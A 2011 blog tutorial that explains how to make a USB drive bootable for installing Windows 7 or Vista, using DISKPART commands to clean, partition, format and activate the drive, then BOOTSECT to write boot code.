Saturday 10 September 2011

How To Install Windows 7 Vista From USB Drive 100% working




This tutorial will show you how to make your USB drive bootable for Windows 7/Vista.

Having a bootable USB is very essential, especially if you are a notebook user. Using a bootable USB to install an operating system (OS) not only makes the installation faster, but also saves a DVD.

The main and biggest advantage is that installing Windows 7/Vista from USB is very fast; it takes almost 20 to 30 minutes only.

Note that this bootable USB guide will not work if you are trying to make a bootable USB on an XP computer.

For this you require:

1) At least a 4 GB USB drive

2) Windows 7/Vista installation files.

The method is very simple and you can use it without any hassles. Needless to say, your motherboard should support the USB boot feature to make use of the bootable USB drive.

Just follow these steps.

NOTE: write commands correctly, with spaces where required.


1) Open Command Prompt with administrator rights.

To access Command Prompt as administrator, write "cmd" in the Start menu search box and hit CTRL+SHIFT+ENTER.

2) In Command Prompt write "DISKPART".

3) Now type "LIST DISK".

4) Now select the disk which is your USB. It may be Disk 1, Disk 2 or Disk 3, so choose carefully. Here mine is Disk 3.
   The format should be like this: "SELECT DISK 3".

5) Now write "CLEAN" and hit "ENTER".

6) Type "CREATE PARTITION PRIMARY".

7) Type "SELECT PARTITION 1".

8) Type "ACTIVE".

9) Type "FORMAT FS=NTFS". (Formatting will take some time, 10 to 15 minutes.)

10) Type "ASSIGN".

11) Type "EXIT".




This is how the whole procedure looks.

Don't close Command Prompt, as we need it.

Now insert the Windows 7/Vista DVD in the DVD-ROM.

12) Type "D: CD BOOT". (Name the drive which contains Windows 7/Vista.)

13) Type "CD BOOT" again.

14) Type "BOOTSECT.EXE /NT60 G:" (Here I wrote G: because after formatting in step 9 the drive name will change automatically, so check it before running the command). G: is the USB drive.

The command given above updates the USB drive with BOOTMGR-compatible code.

This will show the full procedure.

Done. Close Command Prompt and copy the Windows 7/Vista DVD contents onto the USB drive.

Note: Before using USB as your boot device, change the boot priority in the BIOS to USB. If you don't change the boot priority, the USB will not boot.

My tutorials are fully workable and tested by me, so there is no need to worry about anything. I told each and every step so that no one will have any problem.